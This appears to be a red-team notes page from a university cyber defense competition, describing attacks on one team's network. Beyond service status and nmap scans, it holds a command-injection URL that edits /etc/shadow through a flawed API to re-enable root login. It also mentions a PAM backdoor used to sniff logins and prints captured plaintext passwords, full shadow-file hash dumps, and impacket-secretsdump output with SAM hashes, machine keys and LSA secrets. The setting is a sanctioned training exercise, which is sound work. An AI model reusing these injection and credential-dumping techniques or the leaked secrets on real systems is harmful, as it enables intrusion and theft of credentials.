Team Information
- Number
- Team 5
- Name
- dont hack me im sensitive
- IP Range
- 64.5.53.0/24
- Domain
- team5.isucdc.com
- Current Place
- 3rd
- Red Teamer(s)
- None
Service Status
| AD LDAP |
| AD RDP |
| JD RDP |
| LTV SSH |
| NEWS SSH |
| NEWS HTTP |
| WSTN SSH |
| WSTN MQTT |
| WWW SSH |
| WWW HTTP |
Nmap
AD
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team5.isucdc.com0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TEAM5
| NetBIOS_Domain_Name: TEAM5
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: team5.isucdc.com
| DNS_Computer_Name: ad.team5.isucdc.com
| DNS_Tree_Name: team5.isucdc.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-04T15:12:12+00:00
| ssl-cert: Subject: commonName=ad.team5.isucdc.com
| Not valid before: 2025-09-05T01:19:34
|_Not valid after: 2026-03-07T01:19:34
|_ssl-date: 2025-10-04T15:12:20+00:00; -2s from scanner time.
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
53/tcp open domain Simple DNS Plus
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: team5.isucdc.com0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TEAM5
| NetBIOS_Domain_Name: TEAM5
| NetBIOS_Computer_Name: AD
| DNS_Domain_Name: team5.isucdc.com
| DNS_Computer_Name: ad.team5.isucdc.com
| DNS_Tree_Name: team5.isucdc.com
| Product_Version: 10.0.17763
|_ System_Time: 2025-10-04T15:12:12+00:00
| ssl-cert: Subject: commonName=ad.team5.isucdc.com
| Not valid before: 2025-09-05T01:19:34
|_Not valid after: 2026-03-07T01:19:34
|_ssl-date: 2025-10-04T15:12:20+00:00; -2s from scanner time.
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows
LTV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NEWS
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 35:79:94:a9:8d:d5:06:f3:5b:b6:c7:31:79:62:de:08 (RSA)
| 256 95:a6:a9:0f:80:04:10:e4:8b:a0:0b:68:6b:39:07:e8 (ECDSA)
|_ 256 95:78:e1:ee:dc:0e:f6:2b:a3:0d:dd:aa:e0:8f:a7:cd (ED25519)
8080/tcp open http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Disposition: inline;filename=f.txt
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.650+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.607+00:00","status":404,"error":"Not Found","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.631+00:00","status":404,"error":"Not Found","path":"/"}
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| HTTP Status 400
| Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}HTTP Status 400
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 35:79:94:a9:8d:d5:06:f3:5b:b6:c7:31:79:62:de:08 (RSA)
| 256 95:a6:a9:0f:80:04:10:e4:8b:a0:0b:68:6b:39:07:e8 (ECDSA)
|_ 256 95:78:e1:ee:dc:0e:f6:2b:a3:0d:dd:aa:e0:8f:a7:cd (ED25519)
8080/tcp open http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Disposition: inline;filename=f.txt
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.650+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.607+00:00","status":404,"error":"Not Found","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| {"timestamp":"2025-10-04T15:10:51.631+00:00","status":404,"error":"Not Found","path":"/"}
| RTSPRequest, Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sat, 04 Oct 2025 15:10:51 GMT
| Connection: close
| HTTP Status 400
| Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}
HTTP Status 400
|_ Request
WSTN
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:18:5d:f5:ed:78:64:cc:53:87:40:4b:b6:10:86:3a (RSA)
| 256 e4:74:12:60:41:a3:53:40:67:ee:ea:da:c5:42:e3:fd (ECDSA)
|_ 256 07:99:db:38:3a:fe:5a:ba:fc:5c:27:c9:ea:83:c3:c5 (ED25519)
1883/tcp open mqtt
|_mqtt-subscribe: Connection rejected: Not Authorized
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 5a:18:5d:f5:ed:78:64:cc:53:87:40:4b:b6:10:86:3a (RSA)
| 256 e4:74:12:60:41:a3:53:40:67:ee:ea:da:c5:42:e3:fd (ECDSA)
|_ 256 07:99:db:38:3a:fe:5a:ba:fc:5c:27:c9:ea:83:c3:c5 (ED25519)
1883/tcp open mqtt
|_mqtt-subscribe: Connection rejected: Not Authorized
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WWW
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a0:6a:89:c7:a4:b1:37:23:2d:3a:a1:24:c3:76:10:06 (ECDSA)
|_ 256 a8:7c:35:3d:df:2b:92:07:2b:1e:c8:5a:8d:d3:7e:0f (ED25519)
80/tcp open http Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a0:6a:89:c7:a4:b1:37:23:2d:3a:a1:24:c3:76:10:06 (ECDSA)
|_ 256 a8:7c:35:3d:df:2b:92:07:2b:1e:c8:5a:8d:d3:7e:0f (ED25519)
80/tcp open http Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Notable Vulnerabilities
Uploaded Files:
red-team-flag
Team5 LoRA enc: AES-128-ECB, key: 0x9A, 0x21, 0xF3, 0x44, 0xC7, 0x0B, 0x5D, 0xEE, 0x18, 0x77, 0xA2, 0x6C, 0x03, 0x92, 0x51, 0xBF
cdc: cdccdc123
news:
2025-10-04_14:35:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_14:40:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_14:40:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_14:42:28 cdc, Db3f49.K)@;1|Mu, From: 199.100.16.101
2025-10-04_14:42:28 cdc, Db3f49.K)@;1|Mu, From: 199.100.16.101
2025-10-04_14:42:54 reset, tunnelsALLday, From: 12.110.177.46
2025-10-04_14:42:54 reset, tunnelsALLday, From: 12.110.177.46
2025-10-04_14:35:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_14:40:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_14:40:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_14:42:28 cdc, Db3f49.K)@;1|Mu, From: 199.100.16.101
2025-10-04_14:42:28 cdc, Db3f49.K)@;1|Mu, From: 199.100.16.101
2025-10-04_14:42:54 reset, tunnelsALLday, From: 12.110.177.46
2025-10-04_14:42:54 reset, tunnelsALLday, From: 12.110.177.46
www:
root@www:/var/log# cat toomanysecrets.log
2025-10-04_09:45:15 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_09:50:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_09:55:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_10:00:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_10:03:59 cdc, 7^tGo'13Sz{&, From: 192.168.1.3
2025-10-04_10:05:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_09:45:15 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_09:50:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_09:55:14 tina.bell, fof000bex, From: 49.10.235.154
2025-10-04_10:00:14 jennifer.smith, get709dec, From: 49.10.235.154
2025-10-04_10:03:59 cdc, 7^tGo'13Sz{&, From: 192.168.1.3
2025-10-04_10:05:14 jennifer.smith, get709dec, From: 49.10.235.154
API was running as root
They disabled their root login by adding an "!" before the hash
```txt
root:!$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20330:0:99999:7:::
```
But it can be changed with the badly written API:
`
http://news.team5.isucdc.com:8080/weather/help?msg=sed%20-i%20s/root:!/root:/ /etc/shadow` to re-enable itInstalled a PAM backdoor, sniffed the tina.bell login. Was able to ssh to each box with tina.bell and sudo su
2025-10-04_14:35:14 tina.bell, fof000bex, From: 49.10.235.154
root@news:~# cat /etc/shadow
root:$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20330:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
cdc:$6$44MAueNW$OpzLuDVESXEBSBNS0oV3W1h3032NduEl3C2PoPmHJsX65tWq.P3h0x/9aVehzvxyNBqpmwKPoyMpRfKksGTMV/:20365:0:99999:7:::
mysql:!:20330:0:99999:7:::
sssd:*:20330:0:99999:7:::
postfix:*:20330:0:99999:7:::
ntp:*:20337:0:99999:7:::
recovery:$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20365:0:99999:7:::
reset:$6$IdlfM6ZL$xCGWKTlIduJ8GyNz/FwGIP7/CTPjHOk8qb6u7Uu.X/I5ydXdZSDki6v7iLnwINeYFmC.9XyMAQU77QWyf1lWM0:20365:0:99999:7:::
root:$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20330:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
cdc:$6$44MAueNW$OpzLuDVESXEBSBNS0oV3W1h3032NduEl3C2PoPmHJsX65tWq.P3h0x/9aVehzvxyNBqpmwKPoyMpRfKksGTMV/:20365:0:99999:7:::
mysql:!:20330:0:99999:7:::
sssd:*:20330:0:99999:7:::
postfix:*:20330:0:99999:7:::
ntp:*:20337:0:99999:7:::
recovery:$1$dgQLqdog$sDKuQFfXEzcOWXUkfFljy1:20365:0:99999:7:::
reset:$6$IdlfM6ZL$xCGWKTlIduJ8GyNz/FwGIP7/CTPjHOk8qb6u7Uu.X/I5ydXdZSDki6v7iLnwINeYFmC.9XyMAQU77QWyf1lWM0:20365:0:99999:7:::
root@www:/home/tina.bell@team5.isucdc.com# cat /etc/shadow
root:!$y$j9T$xBfkrZNGKvv3ghAkfNQOm/$TtpTreDbhAOKSAMOfbYXdWgFRms9A/o0K1V4UHIzAP2:20325:0:99999:7:::
daemon:*:20325:0:99999:7:::
bin:*:20325:0:99999:7:::
sys:*:20325:0:99999:7:::
sync:*:20325:0:99999:7:::
games:*:20325:0:99999:7:::
man:*:20325:0:99999:7:::
lp:*:20325:0:99999:7:::
mail:*:20325:0:99999:7:::
news:*:20325:0:99999:7:::
uucp:*:20325:0:99999:7:::
proxy:*:20325:0:99999:7:::
www-data:*:20325:0:99999:7:::
backup:*:20325:0:99999:7:::
list:*:20325:0:99999:7:::
irc:*:20325:0:99999:7:::
_apt:*:20325:0:99999:7:::
nobody:*:20325:0:99999:7:::
systemd-network:!*:20325::::::
systemd-timesync:!*:20325::::::
messagebus:!:20325::::::
sshd:!:20325::::::
cdc:$y$j9T$L2vh4X8vJxWrTnpqlOUIe1$zrZId7Axo/n/0pHx.NM3FiKJwuE.4vIptFtCnbVX9.B:20365:0:99999:7:::
tcpdump:!:20330::::::
www:$y$j9T$6TU05NUc3OIyh99XJMqrf0$gjgiO/Kij3zUx/DYCo7QjmBDDjwkJjiRy8HYoHoHPl5:20333:0:99999:7:::
mysql:!:20336::::::
mosquitto:!:20336::::::
ntpsec:!:20337::::::
sssd:!:20337::::::
polkitd:!*:20337::::::
root:!$y$j9T$xBfkrZNGKvv3ghAkfNQOm/$TtpTreDbhAOKSAMOfbYXdWgFRms9A/o0K1V4UHIzAP2:20325:0:99999:7:::
daemon:*:20325:0:99999:7:::
bin:*:20325:0:99999:7:::
sys:*:20325:0:99999:7:::
sync:*:20325:0:99999:7:::
games:*:20325:0:99999:7:::
man:*:20325:0:99999:7:::
lp:*:20325:0:99999:7:::
mail:*:20325:0:99999:7:::
news:*:20325:0:99999:7:::
uucp:*:20325:0:99999:7:::
proxy:*:20325:0:99999:7:::
www-data:*:20325:0:99999:7:::
backup:*:20325:0:99999:7:::
list:*:20325:0:99999:7:::
irc:*:20325:0:99999:7:::
_apt:*:20325:0:99999:7:::
nobody:*:20325:0:99999:7:::
systemd-network:!*:20325::::::
systemd-timesync:!*:20325::::::
messagebus:!:20325::::::
sshd:!:20325::::::
cdc:$y$j9T$L2vh4X8vJxWrTnpqlOUIe1$zrZId7Axo/n/0pHx.NM3FiKJwuE.4vIptFtCnbVX9.B:20365:0:99999:7:::
tcpdump:!:20330::::::
www:$y$j9T$6TU05NUc3OIyh99XJMqrf0$gjgiO/Kij3zUx/DYCo7QjmBDDjwkJjiRy8HYoHoHPl5:20333:0:99999:7:::
mysql:!:20336::::::
mosquitto:!:20336::::::
ntpsec:!:20337::::::
sssd:!:20337::::::
polkitd:!*:20337::::::
impacket-secretsdump tina.bell:fof000bex@127.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM5\AD$:aes256-cts-hmac-sha1-96:601b15b497037b3c633dad9600ca54080d3ed9dc127d625be4c785365e234736
TEAM5\AD$:aes128-cts-hmac-sha1-96:4df201f1f4eb3245f4b83e8bb1b9ed6c
TEAM5\AD$:des-cbc-md5:a785b9b02f2cf840
TEAM5\AD$:plain_password_hex:c8d432351e1a629c9a2be7b835805c02106eb4d543c7a34d5546153530845bd9136d978f19d1d3198ee229f2fdd9f5bb1818d64bf50c709433bcf7ac4f9735fbb1e053e23a997b3ea26db3508e21caaef767ff9b3e652ff1260d5ba88ee463cf4e9a7533bdf96158c71e0f7f314ea95486cd9e086fdfd46c877753a2b208b0faf7eff8842562a2437bc3b992d6d7a96644e3da6fb32b6738551f97784c0fabc728127190672ef9c97e351d1adc793ee7b4168341b2d7ece9e1d8aa72e46906f3afb1f1bc85d0115e3099d3f44a6a55a02d9a9436f3b11ac1e53113ce6158d4b2862328d7c1487cf33a647b1914da3d4d
TEAM5\AD$:aad3b435b51404eeaad3b435b51404ee:06019b701b6c023bee3bd837fc671ec9:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
0000 BC CF D3 A8 51 63 0E 5C 7B 10 26 87 DF 66 09 40 ....Qc.\{.&..f.@
0010 96 0B B5 BD FE 34 CA 80 A8 DC C9 B5 48 A6 61 F4 .....4......H.a.
0020 7A 8A 83 37 4E E6 E1 5F 6E EB B6 DC 3A 86 59 76 z..7N.._n...:.Yv
0030 CD 4C 47 B8 9E 98 FC 6C 3C FE 33 54 EE 37 51 73 .LG....l<.3T.7Qs
0040 0A 66 36 4A CF 46 65 62 BF 4C C1 F7 CF 9A F8 97 .f6J.Feb.L......
0050 36 9D 0D 0B BC 24 C9 5C 66 37 49 C3 7A 3D F1 AD 6....$.\f7I.z=..
0060 AA B6 92 B3 E1 FF 08 7A 78 70 8F CB 31 F9 F1 A4 .......zxp..1...
0070 86 5B 0C 5B E8 8E 2B F6 13 2F 4C 1C 1B 71 AA 39 .[.[..+../L..q.9
0080 10 82 C7 EF AC 0E F8 C4 FE 24 BC 4C 6C 94 B4 6D .........$.Ll..m
0090 AC 89 D9 9E 13 59 E8 FF A4 EC AA 46 4A A6 80 09 .....Y.....FJ...
00a0 4A 3E 91 01 D5 75 5C 2D 7D 3D 3B 50 65 41 1C 4B J>...u\-}=;PeA.K
00b0 73 5B 1C 94 50 4C 79 AE D6 B2 FC 61 56 31 3D 74 s[..PLy....aV1=t
00c0 53 46 EA 11 31 16 35 F1 5E 2A 6B 00 DB A7 D0 31 SF..1.5.^*k....1
00d0 5A 88 F6 79 64 41 5A 58 1B 4D D7 9B 19 1D 35 79 Z..ydAZX.M....5y
00e0 F4 76 5C 62 86 72 1F 52 34 B0 4E E2 A1 85 32 F4 .v\b.r.R4.N...2.
00f0 A5 AC 25 8C 22 60 E1 43 9C 4D BE 9B 02 AC A7 0A ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM
0000 CB 29 1A AF 7D BF E8 20 69 E8 D9 9E 40 DB 0D 6D .)..}.. i...@..m
0010 7D C2 53 C4 DF 55 27 23 E8 DF 5A A9 91 37 9E 38 }.S..U'#..Z..7.8
0020 4B E2 7D B6 92 89 11 38 93 D5 08 B1 93 A3 3B EF K.}....8......;.
0030 8C 80 6B 25 D5 4B FE 41 1B 43 3C 43 AF 93 70 A2 ..k%.K.A.CNL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM5\AD$:aes256-cts-hmac-sha1-96:601b15b497037b3c633dad9600ca54080d3ed9dc127d625be4c785365e234736
TEAM5\AD$:aes128-cts-hmac-sha1-96:4df201f1f4eb3245f4b83e8bb1b9ed6c
TEAM5\AD$:des-cbc-md5:a785b9b02f2cf840
TEAM5\AD$:plain_password_hex:c8d432351e1a629c9a2be7b835805c02106eb4d543c7a34d5546153530845bd9136d978f19d1d3198ee229f2fdd9f5bb1818d64bf50c709433bcf7ac4f9735fbb1e053e23a997b3ea26db3508e21caaef767ff9b3e652ff1260d5ba88ee463cf4e9a7533bdf96158c71e0f7f314ea95486cd9e086fdfd46c877753a2b208b0faf7eff8842562a2437bc3b992d6d7a96644e3da6fb32b6738551f97784c0fabc728127190672ef9c97e351d1adc793ee7b4168341b2d7ece9e1d8aa72e46906f3afb1f1bc85d0115e3099d3f44a6a55a02d9a9436f3b11ac1e53113ce6158d4b2862328d7c1487cf33a647b1914da3d4d
TEAM5\AD$:aad3b435b51404eeaad3b435b51404ee:06019b701b6c023bee3bd837fc671ec9:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
0000 BC CF D3 A8 51 63 0E 5C 7B 10 26 87 DF 66 09 40 ....Qc.\{.&..f.@
0010 96 0B B5 BD FE 34 CA 80 A8 DC C9 B5 48 A6 61 F4 .....4......H.a.
0020 7A 8A 83 37 4E E6 E1 5F 6E EB B6 DC 3A 86 59 76 z..7N.._n...:.Yv
0030 CD 4C 47 B8 9E 98 FC 6C 3C FE 33 54 EE 37 51 73 .LG....l<.3T.7Qs
0040 0A 66 36 4A CF 46 65 62 BF 4C C1 F7 CF 9A F8 97 .f6J.Feb.L......
0050 36 9D 0D 0B BC 24 C9 5C 66 37 49 C3 7A 3D F1 AD 6....$.\f7I.z=..
0060 AA B6 92 B3 E1 FF 08 7A 78 70 8F CB 31 F9 F1 A4 .......zxp..1...
0070 86 5B 0C 5B E8 8E 2B F6 13 2F 4C 1C 1B 71 AA 39 .[.[..+../L..q.9
0080 10 82 C7 EF AC 0E F8 C4 FE 24 BC 4C 6C 94 B4 6D .........$.Ll..m
0090 AC 89 D9 9E 13 59 E8 FF A4 EC AA 46 4A A6 80 09 .....Y.....FJ...
00a0 4A 3E 91 01 D5 75 5C 2D 7D 3D 3B 50 65 41 1C 4B J>...u\-}=;PeA.K
00b0 73 5B 1C 94 50 4C 79 AE D6 B2 FC 61 56 31 3D 74 s[..PLy....aV1=t
00c0 53 46 EA 11 31 16 35 F1 5E 2A 6B 00 DB A7 D0 31 SF..1.5.^*k....1
00d0 5A 88 F6 79 64 41 5A 58 1B 4D D7 9B 19 1D 35 79 Z..ydAZX.M....5y
00e0 F4 76 5C 62 86 72 1F 52 34 B0 4E E2 A1 85 32 F4 .v\b.r.R4.N...2.
00f0 A5 AC 25 8C 22 60 E1 43 9C 4D BE 9B 02 AC A7 0A ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM
0000 CB 29 1A AF 7D BF E8 20 69 E8 D9 9E 40 DB 0D 6D .)..}.. i...@..m
0010 7D C2 53 C4 DF 55 27 23 E8 DF 5A A9 91 37 9E 38 }.S..U'#..Z..7.8
0020 4B E2 7D B6 92 89 11 38 93 D5 08 B1 93 A3 3B EF K.}....8......;.
0030 8C 80 6B 25 D5 4B FE 41 1B 43 3C 43 AF 93 70 A2 ..k%.K.A.CNL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Notable Defenses
fail2ban
perl was made not executable?
perl was made not executable?
Team Spirit Issues
Looks like they are permanently IP banning IP addresses...